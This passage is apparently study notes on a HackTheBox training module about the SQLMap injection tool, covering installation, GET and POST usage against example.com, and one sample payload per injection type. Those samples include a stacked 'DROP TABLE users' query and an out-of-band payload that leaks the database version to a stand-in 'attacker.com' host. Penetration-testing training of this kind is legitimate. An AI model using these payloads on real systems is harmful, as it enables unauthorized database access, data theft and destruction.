HackTheBox — SQLMap Essentials

SQLMap is a common tool that is used for automating the process of detecting and exploiting SQL Injection vulnerabilities.Installationsudo apt install sqlmapConfirm the installationpython sqlmap.py

Supported Databases

SQLMap has the largest support for DBMSes of any other SQL exploitation tool. SQLMap fully supports the following DBMSes:

Supported SQL Injection Types

SQLMap supports the following types of SQL Injection:B: Boolean-based blind AND 1=1E: Error-based AND GTID_SUBSET(@@version,0)U: Union query-based UNION ALL SELECT 1, @@version,3S: Stacked queries ;DROP TABLE usersT: Time-based blind AND 1=IF(2>1,SLEEP(5),0)Q: Inline queries SELECT (SELECT @@version) fromOut-of-band SQL Injection LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\README.txt'))

curl command

sqlmap command can be used like curl command to request a pagesqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'

GET/POST Requests

GET requests’ parameters are specified in the URL, so it should be easy to use sqlmap with GET request.POST requests can use --data flag to specify the parameterssqlmap "https://example.com" --data "uid=1&name=test"The above sqlmap command will test both parameters uid and name for vulnerability. If we only want to test the uid field, we can modify the command